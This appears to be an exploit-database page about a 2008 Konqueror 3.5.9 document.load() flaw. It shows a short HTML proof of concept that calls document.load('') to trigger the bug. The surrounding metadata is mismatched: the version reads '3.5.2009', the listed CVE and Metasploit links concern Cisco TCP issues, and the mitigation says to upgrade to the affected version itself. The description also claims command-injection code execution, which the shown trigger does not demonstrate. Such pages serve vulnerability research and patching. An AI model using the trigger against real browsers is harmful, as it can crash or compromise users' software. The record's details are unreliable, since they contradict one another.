header-logo
Suggest Exploit
vendor:
Konqueror
by:
Jeremy Brown
9.3
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Konqueror
Affected Version From: 3.5.2009
Affected Version To: 3.5.2009
Patch Exists: YES
Related CWE: CVE-2008-4609
CPE: a:kde:konqueror:3.5.9
Metasploit: https://www.rapid7.com/db/vulnerabilities/cisco-nx-os-cisco-sa-20090908-tcp24/https://www.rapid7.com/db/vulnerabilities/cisco-sa-20090908-tcp24/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 8.04
2008

Konqueror 3.5.9 document.load() Remote Code Execution

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Konqueror. Authentication is not required to exploit this vulnerability. The specific flaw exists within the document.load() function. The issue lies in the fact that the function does not properly validate user-supplied input before using it to execute a command. An attacker can leverage this vulnerability to execute arbitrary code under the context of the user running the application.

Mitigation:

Upgrade to the latest version of Konqueror 3.5.9 or later.
Source

Exploit-DB raw data:

<!--- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]
      Tested on Ubuntu 8.04 + Konqueror 3.5.9
      A product of my fuzzing projects :)                           -->
<html>
<script type="text/javascript">
document.load('');
</script>
</html>

# milw0rm.com [2008-10-10]

Navigation

Suggest Exploit

Services By CQR